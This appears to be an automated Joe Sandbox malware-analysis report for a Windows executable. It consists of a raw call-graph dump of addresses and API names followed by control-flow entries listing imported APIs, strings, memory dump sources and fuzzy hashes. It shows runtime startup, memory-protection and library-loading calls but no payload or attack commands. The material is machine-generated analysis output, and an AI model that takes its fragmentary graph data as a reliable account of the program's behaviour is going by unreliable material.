76422 7ff6fdfe462a 76420->76422 76423 7ff6fe09aef8 _set_fmode 14 API calls 76421->76423 76422->76418 76426 7ff6fe09b380 76422->76426 76424 7ff6fe09b00e 76423->76424 76429 7ff6fe0a8b14 23 API calls _invalid_parameter_noinfo 76424->76429 76430 7ff6fe09b3a0 76426->76430 76429->76422 76431 7ff6fe09b398 76430->76431 76432 7ff6fe09b3ca 76430->76432 76431->76418 76432->76431 76433 7ff6fe09b416 76432->76433 76434 7ff6fe09b3d9 memcpy_s 76432->76434 76443 7ff6fe081c78 EnterCriticalSection 76433->76443 76436 7ff6fe09aef8 _set_fmode 14 API calls 76434->76436 76438 7ff6fe09b3ee 76436->76438 76437 7ff6fe09b41e 76439 7ff6fe09b120 _fread_nolock 37 API calls 76437->76439 76444 7ff6fe0a8b14 23 API calls _invalid_parameter_noinfo 76438->76444 76441 7ff6fe09b435 76439->76441 76442 7ff6fe081c84 _fread_nolock LeaveCriticalSection 76441->76442 76442->76431 76444->76431 76446 7ff6fe0051c0 94 API calls 76445->76446 76448 7ff6fe005ca8 76446->76448 76447 7ff6fe005d8b 76449 7ff6fe005dcf 76447->76449 76450 7ff6fe005d96 std::rsfun 76447->76450 76448->76447 76455 7ff6fe004c4f 76448->76455 76475 7ff6fe01e570 94 API calls 3 library calls 76448->76475 76452 7ff6fe005170 94 API calls 76449->76452 76453 7ff6fdfeb7a0 type_info::_name_internal_method 94 API calls 76450->76453 76454 7ff6fe005deb 76452->76454 76453->76455 76456 7ff6fdfeb7a0 type_info::_name_internal_method 94 API calls 76454->76456 76455->76395 76471 7ff6fe004e10 94 API calls 2 library calls 76455->76471 76456->76455 76458 7ff6fe0051f9 76457->76458 76459 7ff6fe0051e8 76457->76459 76458->76395 76476 7ff6fe004ed0 76459->76476 76462 7ff6fe0051ac 76461->76462 76463 7ff6fe005198 76461->76463 76462->76395 76464 7ff6fe004ed0 94 API calls 76463->76464 76464->76462 76467 7ff6fe00486e 76465->76467 76466 7ff6fdfe8da0 wcsxfrm 94 API calls 76468 7ff6fe0049ac 76466->76468 76467->76466 76489 7ff6fe005790 94 API calls type_info::_name_internal_method 76468->76489 76470 7ff6fe004ad7 76470->76395 76471->76395 76472->76395 76473->76395 76474->76391 
76475->76448 76477 7ff6fe004eec 76476->76477 76483 7ff6fe004f06 memcpy_s 76477->76483 76486 7ff6fe004e10 94 API calls 2 library calls 76477->76486 76479 7ff6fe005023 76480 7ff6fe005039 76479->76480 76487 7ff6fe004e10 94 API calls 2 library calls 76479->76487 76480->76458 76483->76479 76483->76480 76484 7ff6fe004790 94 API calls 76483->76484 76485 7ff6fdfe4600 39 API calls 76483->76485 76488 7ff6fdfe0690 94 API calls 2 library calls 76483->76488 76484->76483 76485->76483 76486->76483 76487->76480 76488->76483 76489->76470 76491 7ff6fe03a9b7 76490->76491 76526 7ff6fe03a900 76491->76526 76493 7ff6fe03aa15 76530 7ff6fdff37c0 76493->76530 76495 7ff6fe03aa87 76533 7ff6fe02aa20 76495->76533 76501 7ff6fe03f750 5 API calls 76510 7ff6fe03abb7 76501->76510 76502 7ff6fe03f660 94 API calls 76502->76510 76504 7ff6fe03b460 94 API calls 76504->76510 76509 7ff6fe03aebf memcpy_s 76556 7ff6fe03f750 76509->76556 76510->76501 76510->76502 76510->76504 76510->76509 76512 7ff6fdff37c0 94 API calls 76510->76512 76542 7ff6fe04e3a0 76510->76542 76546 7ff6fe03e150 76510->76546 76552 7ff6fe0421b0 76510->76552 76560 7ff6fe04e040 94 API calls 76510->76560 76561 7ff6fe04cc10 RtlCaptureContext RtlLookupFunctionEntry RtlRestoreContext RtlVirtualUnwind RaiseException 76510->76561 76562 7ff6fe0404a0 94 API calls 76510->76562 76563 7ff6fe04d4f0 94 API calls 2 library calls 76510->76563 76512->76510 76515 7ff6fe03aff8 _handle_error 76515->75715 76517 7ff6fdff5611 76516->76517 76601 7ff6fe02aa90 76517->76601 76519 7ff6fdff597e 76519->75717 76520 7ff6fdff583b 76520->76519 76604 7ff6fe04ee70 94 API calls 2 library calls 76520->76604 76522 7ff6fdff589d 76522->76519 76523 7ff6fdfeb7a0 type_info::_name_internal_method 94 API calls 76522->76523 76524 7ff6fdff58e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 76523->76524 76605 7ff6fe04f070 94 API calls _wcsupr_s 76524->76605 76527 7ff6fe03a926 76526->76527 76528 7ff6fe03a930 76526->76528 76565 7ff6fe055d90 94 API calls _free_nolock 76527->76565 
76528->76493 76531 7ff6fdfe8d00 _free_nolock 94 API calls 76530->76531 76532 7ff6fdff383b memcpy_s 76531->76532 76532->76495 76534 7ff6fe02aa49 76533->76534 76535 7ff6fe02aa3d 76533->76535 76569 7ff6fe02aee0 76534->76569 76566 7ff6fe02b0e0 76535->76566 76538 7ff6fe02aa47 76539 7ff6fe04c660 76538->76539 76592 7ff6fe042a10 94 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76539->76592 76541 7ff6fe04c685 76541->76510 76543 7ff6fe04e3e6 76542->76543 76545 7ff6fe04e5dd 76543->76545 76593 7ff6fdff36b0 5 API calls 2 library calls 76543->76593 76545->76510 76548 7ff6fe03e16f 76546->76548 76547 7ff6fe03e273 76547->76510 76549 7ff6fe03e1e6 76548->76549 76594 7ff6fe03b460 76548->76594 76549->76547 76551 7ff6fe03b460 94 API calls 76549->76551 76551->76549 76554 7ff6fe0421c8 type_info::_name_internal_method 76552->76554 76553 7ff6fe042291 76553->76510 76554->76553 76599 7ff6fe03e540 94 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76554->76599 76557 7ff6fe03f775 76556->76557 76558 7ff6fe03af63 76556->76558 76557->76558 76600 7ff6fdff36b0 5 API calls 2 library calls 76557->76600 76558->76515 76564 7ff6fdff36b0 5 API calls 2 library calls 76558->76564 76560->76510 76561->76510 76562->76510 76563->76510 76564->76515 76565->76528 76575 7ff6fe02af50 76566->76575 76570 7ff6fe02af2e 76569->76570 76571 7ff6fe02aefe 76569->76571 76570->76538 76589 7ff6fe02ade0 VirtualProtect 76571->76589 76580 7ff6fe02af88 Concurrency::details::_UnrealizedChore::_CancelViaToken 76575->76580 76576 7ff6fe02b0c3 76587 7ff6fdff36b0 5 API calls 2 library calls 76576->76587 76578 7ff6fe02b03b 76578->76538 76580->76576 76580->76578 76582 7ff6fe02ad30 VirtualAlloc 76580->76582 76586 7ff6fe02ada0 VirtualFree 76580->76586 76583 7ff6fe02ad87 76582->76583 76584 7ff6fe02ad70 76582->76584 76583->76580 76584->76583 76588 7ff6fdff36b0 5 API calls 2 library calls 76584->76588 76586->76580 76587->76578 76588->76583 76590 7ff6fe02ae11 76589->76590 76590->76570 76591 7ff6fe02ae40 94 
API calls 2 library calls 76590->76591 76591->76570 76592->76541 76593->76545 76595 7ff6fe03b48d 76594->76595 76596 7ff6fe03b483 76594->76596 76595->76548 76598 7ff6fe03b410 94 API calls 76596->76598 76598->76595 76599->76554 76600->76558 76602 7ff6fe02aee0 94 API calls 76601->76602 76603 7ff6fe02aabe 76602->76603 76603->76520 76604->76522 76605->76519 76607 7ff6fdfdb3ed 76606->76607 76608 7ff6fdfe8484 76606->76608 76610 7ff6fdfe8420 76607->76610 76608->76607 76614 7ff6fdfea690 76608->76614 76611 7ff6fdfe8429 76610->76611 76612 7ff6fdfdb3f7 76611->76612 76621 7ff6fdfea850 76611->76621 76612->75612 76615 7ff6fdfea707 76614->76615 76616 7ff6fdfd2f8a 94 API calls 76615->76616 76617 7ff6fdfea7dd 76616->76617 76618 7ff6fdfea844 76617->76618 76620 7ff6fdfe0600 5 API calls _free_nolock 76617->76620 76618->76608 76620->76618 76622 7ff6fdfea888 76621->76622 76623 7ff6fdfea8bd 76622->76623 76626 7ff6fdfea9a3 wcsxfrm 76622->76626 76630 7ff6fdfed720 94 API calls 3 library calls 76623->76630 76625 7ff6fdfea99e 76625->76611 76626->76625 76627 7ff6fdfea690 94 API calls 76626->76627 76627->76625 76628 7ff6fdfea94c 76628->76625 76629 7ff6fdfea690 94 API calls 76628->76629 76629->76625 76630->76628 76632 7ff6fdfe3d67 76631->76632 76633 7ff6fdfe3cbf 76631->76633 76644 7ff6fdfe2320 94 API calls _free_nolock 76632->76644 76643 7ff6fdfe2320 94 API calls _free_nolock 76633->76643 76636 7ff6fdfe310f 76636->75728 76636->75729 76639 7ff6fdff4020 76637->76639 76638 7ff6fdfd3037 _mbsncpy_s 94 API calls 76638->76639 76639->76638 76640 7ff6fdff4089 76639->76640 76640->75731 76641->75735 76642->75735 76643->76636 76644->76636 76645 7ff6fdfd4a01 76646 7ff6fdfd4a0c 76645->76646 76649 7ff6fdfd4a30 76645->76649 76646->76649 76650 7ff6fdfe2dc0 76646->76650 76664 7ff6fdff40a0 96 API calls _set_fmode 76649->76664 76651 7ff6fe09aef8 _set_fmode 14 API calls 76650->76651 76652 7ff6fdfe2dd3 GetLastError 76651->76652 76653 7ff6fdfe2e77 76652->76653 76654 7ff6fdfe2ee6 76653->76654 76655 7ff6fdff3fc0 94 API 
calls 76653->76655 76656 7ff6fdfe2f35 wcsxfrm 76654->76656 76665 7ff6fdfe3a80 98 API calls _handle_error 76654->76665 76655->76654 76662 7ff6fdfe3005 76656->76662 76666 7ff6fdfe3a80 98 API calls _handle_error 76656->76666 76657 7ff6fdfe3074 76659 7ff6fe09aef8 _set_fmode 14 API calls 76657->76659 76660 7ff6fdfe3079 SetLastError 76659->76660 76660->76649 76662->76657 76667 7ff6fdfe3a80 98 API calls _handle_error 76662->76667 76664->76649 76665->76656 76666->76662 76667->76657 76668 7ff6fdfd1a21 76671 7ff6fdfefd90 76668->76671 76670 7ff6fdfd1a47 76670->76670 76681 7ff6fdfefdb8 76671->76681 76672 7ff6fdfefeb0 wcsxfrm 76686 7ff6fdfeff71 strrchr _mbsncpy_s 76672->76686 76698 7ff6fdfe0a70 94 API calls 2 library calls 76672->76698 76676 7ff6fdff02a6 76677 7ff6fdff02fd 76676->76677 76678 7ff6fdff02b7 76676->76678 76682 7ff6fdff037d 76677->76682 76687 7ff6fdff0333 76677->76687 76700 7ff6fe00e9c0 94 API calls 76678->76700 76681->76672 76681->76676 76681->76686 76691 7ff6fdfef2a0 76681->76691 76695 7ff6fdfef2f0 76681->76695 76699 7ff6fdfe0950 94 API calls strrchr 76681->76699 76684 7ff6fdff0383 76682->76684 76685 7ff6fdff0396 76682->76685 76683 7ff6fdff02f8 76683->76670 76702 7ff6fe001a40 94 API calls 2 library calls 76684->76702 76703 7ff6fe022fe0 94 API calls type_info::_name_internal_method 76685->76703 76686->76670 76701 7ff6fe00e9c0 94 API calls 76687->76701 76692 7ff6fdfef2d5 76691->76692 76693 7ff6fdfef2c7 76691->76693 76692->76681 76704 7ff6fe00e3f0 94 API calls 3 library calls 76693->76704 76696 7ff6fdfeb7a0 type_info::_name_internal_method 94 API calls 76695->76696 76697 7ff6fdfef32a 76696->76697 76697->76681 76698->76686 76699->76681 76700->76683 76701->76683 76702->76683 76703->76683 76704->76692 76705 7ff6fdff56dc 76716 7ff6fe03b100 76705->76716 76708 7ff6fe02aa90 94 API calls 76710 7ff6fdff583b 76708->76710 76709 7ff6fdff597e 76710->76709 76721 7ff6fe04ee70 94 API calls 2 library calls 76710->76721 76712 7ff6fdff589d 76712->76709 76713 7ff6fdfeb7a0 
type_info::_name_internal_method 94 API calls 76712->76713 76714 7ff6fdff58e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 76713->76714 76722 7ff6fe04f070 94 API calls _wcsupr_s 76714->76722 76723 7ff6fe02ab10 76716->76723 76718 7ff6fe02ab10 94 API calls 76720 7ff6fdff5725 76718->76720 76719 7ff6fe03b138 76719->76718 76720->76708 76721->76712 76722->76709 76724 7ff6fe02ab2a 76723->76724 76725 7ff6fe02ab81 76723->76725 76727 7ff6fe02ab3d 76724->76727 76728 7ff6fe02ab4e 76724->76728 76726 7ff6fe02abd2 76725->76726 76729 7ff6fe02abbc 76725->76729 76733 7ff6fe02ab4c 76726->76733 76735 7ff6fe02ade0 VirtualProtect 76726->76735 76730 7ff6fe02aee0 94 API calls 76727->76730 76731 7ff6fe02ade0 VirtualProtect 76728->76731 76732 7ff6fe02aee0 94 API calls 76729->76732 76730->76733 76734 7ff6fe02ab67 76731->76734 76732->76733 76733->76719 76734->76733 76739 7ff6fe02ae40 94 API calls 2 library calls 76734->76739 76736 7ff6fe02ac1f 76735->76736 76736->76733 76740 7ff6fe02ae40 94 API calls 2 library calls 76736->76740 76739->76733 76740->76733 76741 7ff6fe07d4e4 76766 7ff6fe07d6a8 76741->76766 76744 7ff6fe07d630 76794 7ff6fe07d9d4 7 API calls 2 library calls 76744->76794 76745 7ff6fe07d500 __scrt_acquire_startup_lock 76747 7ff6fe07d63a 76745->76747 76749 7ff6fe07d51e 76745->76749 76795 7ff6fe07d9d4 7 API calls 2 library calls 76747->76795 76754 7ff6fe07d53f __scrt_release_startup_lock 76749->76754 76774 7ff6fe0a675c 76749->76774 76751 7ff6fe07d543 76752 7ff6fe07d645 _free_nolock _CallSETranslator 76753 7ff6fe07d5c9 76779 7ff6fe07db20 76753->76779 76754->76751 76754->76753 76791 7ff6fe09adf8 26 API calls 76754->76791 76756 7ff6fe07d5ce 76782 7ff6fe0a6688 76756->76782 76763 7ff6fe07d5f1 76763->76752 76793 7ff6fe07d83c 7 API calls __scrt_initialize_crt 76763->76793 76765 7ff6fe07d608 76765->76751 76796 7ff6fe07dc9c 76766->76796 76769 7ff6fe07d6d7 76798 7ff6fe0a8760 76769->76798 76770 7ff6fe07d4f8 76770->76744 76770->76745 76776 7ff6fe0a676f 76774->76776 76775 7ff6fe0a678c 
76775->76754 76776->76775 76976 7ff6fe081ae8 76776->76976 76988 7ff6fe07d400 76776->76988 77073 7ff6fe07e110 76779->77073 76783 7ff6fe0b695c 37 API calls 76782->76783 76785 7ff6fe0a6697 76783->76785 76784 7ff6fe07d5d6 76787 7ff6fdfd50e0 76784->76787 76785->76784 77075 7ff6fe0b6c94 26 API calls TranslateName 76785->77075 76788 7ff6fdfd50fd 76787->76788 77076 7ff6fdfd6b70 76788->77076 76791->76753 76792 7ff6fe07db64 GetModuleHandleW 76792->76763 76793->76765 76794->76747 76795->76752 76797 7ff6fe07d6ca __scrt_dllmain_crt_thread_attach 76796->76797 76797->76769 76797->76770 76799 7ff6fe0bad18 76798->76799 76800 7ff6fe07d6dc 76799->76800 76804 7ff6fe0b68a4 76799->76804 76819 7ff6fe0b695c 76799->76819 76800->76770 76803 7ff6fe07f154 7 API calls 2 library calls 76800->76803 76803->76770 76805 7ff6fe0b68c7 76804->76805 76807 7ff6fe0b68d1 76805->76807 76834 7ff6fe0a91ac EnterCriticalSection 76805->76834 76809 7ff6fe0b6943 76807->76809 76825 7ff6fe0a87cc 76807->76825 76809->76799 76813 7ff6fe0b695b 76815 7ff6fe0b69ae 76813->76815 76816 7ff6fe0aaa74 26 API calls 76813->76816 76815->76799 76817 7ff6fe0b6998 76816->76817 76818 7ff6fe0b66e4 37 API calls 76817->76818 76818->76815 76820 7ff6fe0b69ae 76819->76820 76821 7ff6fe0b6969 76819->76821 76820->76799 76838 7ff6fe0aaa74 76821->76838 76835 7ff6fe09a6c0 EnterCriticalSection LeaveCriticalSection _CallSETranslator 76825->76835 76827 7ff6fe0a87d5 76828 7ff6fe0a87e4 76827->76828 76836 7ff6fe09a710 26 API calls 5 library calls 76827->76836 76830 7ff6fe0a8817 _CallSETranslator 76828->76830 76831 7ff6fe0a87ed IsProcessorFeaturePresent 76828->76831 76832 7ff6fe0a87fc 76831->76832 76837 7ff6fe0a8900 6 API calls 3 library calls 76832->76837 76835->76827 76836->76828 76837->76830 76839 7ff6fe0aaa85 76838->76839 76843 7ff6fe0aaa8a 76838->76843 76881 7ff6fe0a97e0 6 API calls try_get_function 76839->76881 76842 7ff6fe0aaaa9 76844 7ff6fe0a921c _wcsupr_s 14 API calls 76842->76844 76861 7ff6fe0aaa92 76842->76861 76843->76861 76882 7ff6fe0a9828 
6 API calls try_get_function 76843->76882 76846 7ff6fe0aaabc 76844->76846 76845 7ff6fe0a87cc _CallSETranslator 26 API calls 76847 7ff6fe0aab1a 76845->76847 76848 7ff6fe0aaada 76846->76848 76849 7ff6fe0aaaca 76846->76849 76885 7ff6fe0a9828 6 API calls try_get_function 76848->76885 76883 7ff6fe0a9828 6 API calls try_get_function 76849->76883 76850 7ff6fe0aab0c 76863 7ff6fe0b66e4 76850->76863 76853 7ff6fe0aaad1 76884 7ff6fe0a9294 14 API calls 2 library calls 76853->76884 76854 7ff6fe0aaae2 76855 7ff6fe0aaaf8 76854->76855 76856 7ff6fe0aaae6 76854->76856 76887 7ff6fe0aa750 14 API calls _set_fmode 76855->76887 76886 7ff6fe0a9828 6 API calls try_get_function 76856->76886 76860 7ff6fe0aab00 76888 7ff6fe0a9294 14 API calls 2 library calls 76860->76888 76861->76845 76861->76850 76864 7ff6fe0b68a4 37 API calls 76863->76864 76865 7ff6fe0b670d 76864->76865 76889 7ff6fe0b63f0 76865->76889 76868 7ff6fe0b6727 76868->76820 76869 7ff6fe0aa290 wcsftime 15 API calls 76871 7ff6fe0b6738 76869->76871 76870 7ff6fe0b67d3 76905 7ff6fe0a9294 14 API calls 2 library calls 76870->76905 76871->76870 76896 7ff6fe0b69d8 76871->76896 76874 7ff6fe0b67c7 76875 7ff6fe0b67ce 76874->76875 76878 7ff6fe0b67f3 76874->76878 76876 7ff6fe09aef8 _set_fmode 14 API calls 76875->76876 76876->76870 76877 7ff6fe0b6830 76877->76870 76907 7ff6fe0b6234 23 API calls 5 library calls 76877->76907 76878->76877 76906 7ff6fe0a9294 14 API calls 2 library calls 76878->76906 76882->76842 76883->76853 76884->76861 76885->76854 76886->76853 76887->76860 76888->76861 76890 7ff6fe083ea8 TranslateName 26 API calls 76889->76890 76891 7ff6fe0b6404 76890->76891 76892 7ff6fe0b6410 GetOEMCP 76891->76892 76893 7ff6fe0b6422 76891->76893 76895 7ff6fe0b6437 76892->76895 76894 7ff6fe0b6427 GetACP 76893->76894 76893->76895 76894->76895 76895->76868 76895->76869 76897 7ff6fe0b63f0 28 API calls 76896->76897 76898 7ff6fe0b6a03 76897->76898 76899 7ff6fe0b6a40 IsValidCodePage 76898->76899 76900 7ff6fe0b6a83 memcpy_s _handle_error 76898->76900 

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1330151763-0
                                                                                                                                                                        • Opcode ID: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                                                                                                                                        • Instruction ID: 0c09bd8aaf0776702dc5a30b405a1347687a942498198be3e7c33f5ea16c0f06
                                                                                                                                                                        • Opcode Fuzzy Hash: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                                                                                                                                        • Instruction Fuzzy Hash: 3CC17036B24A4685EB10CF68C4905AD3B75FBA9B98B104226EA2ED77D9DF38D461C340
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$try_get_function
                                                                                                                                                                        • String ID: LCMapStringEx
                                                                                                                                                                        • API String ID: 1203122356-3893581201
                                                                                                                                                                        • Opcode ID: fe23b64af8606f0a3c58e90187f372446aa5f227ab9bf59dc9e7446795e0f6b7
                                                                                                                                                                        • Instruction ID: b3a541c473176c8fafab018ea3948e44824417c59caf673506351939eb75a334
                                                                                                                                                                        • Opcode Fuzzy Hash: fe23b64af8606f0a3c58e90187f372446aa5f227ab9bf59dc9e7446795e0f6b7
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D112F35708B8186D760CB55F48029AB7A0F7D9B90F544136EA9D83B59DF3CD4508B40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressCallerLibraryLoadProc
                                                                                                                                                                        • String ID: SystemFunction036$advapi32.dll
                                                                                                                                                                        • API String ID: 4215043672-1354007664
                                                                                                                                                                        • Opcode ID: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                                                                                                                                        • Instruction ID: 7aa796dc2e0398b2d4c3aeed76692f1ac2d2ba812a4f57b062a8cece45676dfd
                                                                                                                                                                        • Opcode Fuzzy Hash: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                                                                                                                                        • Instruction Fuzzy Hash: F7113C22E1EA4381EB609B10E89473627A4FBD03A4F500231E9AEC32D8FF7CE464C650
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00007FF6FE05EDD3), ref: 00007FF6FE05F013
                                                                                                                                                                        • LoadLibraryExA.KERNELBASE(?,?,?,?,?,?,00007FF6FE05EDD3), ref: 00007FF6FE05F034
                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FE0217E7), ref: 00007FF6FE05F061
                                                                                                                                                                          • Part of subcall function 00007FF6FE05EE80: GetLastError.KERNEL32 ref: 00007FF6FE05EE96
                                                                                                                                                                          • Part of subcall function 00007FF6FE05EE80: FormatMessageA.KERNEL32 ref: 00007FF6FE05EECA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$FormatLibraryLoadMessage
                                                                                                                                                                        • String ID: cannot load module '%s': %s
                                                                                                                                                                        • API String ID: 3853237079-2554058836
                                                                                                                                                                        • Opcode ID: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                                                                                                                                        • Instruction ID: 1a19da78692ec3c980ec3a6c3c530f79ba538eb7f6b7847e08248d52b6cb69ce
                                                                                                                                                                        • Opcode Fuzzy Hash: df188ce702c3eb17da8a1c255447b51e67c1ee2f39d31328e8d2608fad6f4809
                                                                                                                                                                        • Instruction Fuzzy Hash: A8F01932A18B8182D710DB59F84021ABB70FBD97D4F600136FA9D83A78EF3CD5A48B00
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1452418845-0
                                                                                                                                                                        • Opcode ID: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                                                                                                                                        • Instruction ID: 0adc8ac71d415f65334fa72b99fa6d4d02409668de8080936a37b4e7c4cfdd32
                                                                                                                                                                        • Opcode Fuzzy Hash: 8f06a7c1d25b1d9d4209a0557e7fbf7031a6169d9c2e25739453ee5eb69d5cde
                                                                                                                                                                        • Instruction Fuzzy Hash: 35314F21E1D24346FB54AB6494113B92FA1AFE2748F444639F96ECB6D7FE2CF8248210
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
